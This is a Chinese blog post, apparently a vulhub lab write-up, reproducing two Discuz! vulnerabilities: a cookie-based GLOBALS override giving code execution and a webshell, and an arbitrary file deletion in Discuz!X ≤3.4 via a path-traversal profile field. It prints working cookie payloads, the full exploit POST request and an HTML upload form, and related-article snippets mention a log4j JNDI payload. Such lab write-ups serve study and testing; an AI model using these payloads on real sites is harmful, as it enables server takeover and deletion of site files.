vulhub靶场漏洞复现——Discuz

最新推荐文章于 2024-03-07 17:39:55 发布
最新推荐文章于 2024-03-07 17:39:55 发布
阅读量387 收藏 2
点赞数
分类专栏: vulhub刷题记录 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pigzlfa/article/details/132967996
版权
文章介绍了Discuz!论坛系统中的安全漏洞,包括全局变量防御绕过导致的代码执行漏洞,以及任意文件删除漏洞。详细描述了如何利用这些漏洞获取shell和修改用户资料。
摘要由CSDN通过智能技术生成

Discuz简介:

Crossday Discuz! Board(简称 Discuz!,中国国家版权局著作权登记号 2006SR11895)是北京康盛新创科技有限责任公司推出的一套通用的社区建站系统,站长可以不需要任何编程基础,通过简单的安装和设置,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的网站。Discuz! 的基础架构采用世界上最流行的web编程组合PHP+MySQL实现,是一个经过完善设计,适用于各种服务器环境的高效建站解决方案。

全局变量防御绕过导致代码执行(wooyun-2010-080723)

漏洞原理:
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$ _REQUEST中不再包含$ _COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

安装数据库:
http://ip:8080/install/
在这里插入图片描述在这里插入图片描述

填写联系方式后,自动跳转页面
在这里插入图片描述在这里插入图片描述

登陆后随意找一个帖子抓包,在cookie中加入

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;
GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

在这里插入图片描述
成功打印phpinfo信息

getshell操作:

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;
GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[shell])%3B;

在这里插入图片描述

用蚁剑连接
在这里插入图片描述
在这里插入图片描述

Value是请求包里cookie的值

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

Discuz!X ≤3.4 任意文件删除漏洞

访问本地robots.txt,文件是存在的
在这里插入图片描述

安装数据库
在这里插入图片描述
注册用户
在这里插入图片描述个人资料页面
在这里插入图片描述

在个人主页找到formhash
在这里插入图片描述
带上ip,cookie、formhash发送数据包
在这里插入图片描述

POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--

`
此时可以看到个人资料页面出生地被修改
在这里插入图片描述
说明我们的脏数据已经进入数据库了。

进入docker容器内,可以看到robots.txt
在这里插入图片描述
写入一个upload文件

<body>
    <form action="http://192.168.102.8/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=
[formhash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

找到docker里面网站的存放目录(费老鼻子劲啊我去)
在这里插入图片描述
想尝试一下ftp传送文件

连接xftp,传送upload文件
在这里插入图片描述访问一下,随便上传一个图片
在这里插入图片描述
在这里插入图片描述

可以看到出生地被修改成图片名了
查看文件目录,可以看到robots.txt被删除了在这里插入图片描述访问一下

在这里插入图片描述
OK!
(tips:用最开始的浏览器访问还是能访问到,我猜是缓存的原因,换了个浏览器就好了)

pigzlfa
关注
专栏目录
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1888
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2478
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
漏洞复现Discuz-x3.1 插件漏洞
weixin_47443077的博客
05-27 2165
Discuz-x3.1 插件漏洞 文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用 一、漏洞背景 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 二、信息收集 本地IIS搭建Discuz-x3.1,发现不能直接访问 进行
网站漏洞修复对DiscuzX3.4论坛总是被篡改页面
网站安全专家
04-26 2379
Discuz!论坛目前最新版本为3.4版本,已经好久没有更新了,我们SINE安全在对其网站安全检测的同时发现一处漏洞,该漏洞可导致论坛的后台文件可以任意的删除,导致网站瘫痪,后台无法登陆。关于该网站漏洞的细节我们来详细的分析看一下: Discuz漏洞的检测与分析 该漏洞发生的位置在于source目录下的admincp文件夹里的admincp_forums.php代码里,我们用note编辑器打开...
Discuz漏洞复现
小小猪的博客
11-30 6028
Discuz漏洞复现 漏洞描述: Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。 漏洞影响版本: Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org (注意:支持多语言切换可能会有这个漏洞!) 环境搭建: 这里用安鸾渗透测试实战平台环境 :地址 这里访问robots.txt,发现下面有很多路径,访问之
Discuz漏洞
W_seventeen的博客
08-01 4968
1、漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
Discuz X 3.4 系列漏洞梳理
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 1058
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2:Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6605
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
Discuz漏洞整理.pdf
11-15
Discuz漏洞整理,基本囊括了所有已知discuz漏洞,推荐人群为:渗透测试工程师/安全研究员
漏洞复现-Discuz-代码执行】Discuz_CVE-2019-13956
10-13 2336
Discuz-代码执行】可控,包含
discuz安装_Discuz! ml RCE漏洞复现(自写EXP分享)
weixin_39946300的博客
12-28 951
# 000 前言大家好我是PANDA墨森,昨天公众号粉丝涨了一大波,首先感谢一下圈子社区的大力分享,也祝愿圈子社区能越办越好!今天的文章还是老样子,漏洞复现+自写EXP分享,脚本有需要的后台留言,也可以自行更改,话不多说,往下看#001 Discuz!ml简介:Discuz!ml是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
漏洞复现-discuz-wooyun-命令执行】vulfocus/discuz-wooyun_2010_080723
10-14 1241
discuz-wooyun-命令执行】Cookie中命令执行
360众测靶场题库之18- Discuz系统漏洞
最新发布
zjl12344的博客
03-07 368
360众测靶场题库
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 945
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 4631
Discuz!X全版本存在SQL注入漏洞漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4854
Discuz v3.4系列 远程代码执行漏洞全流程详解
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值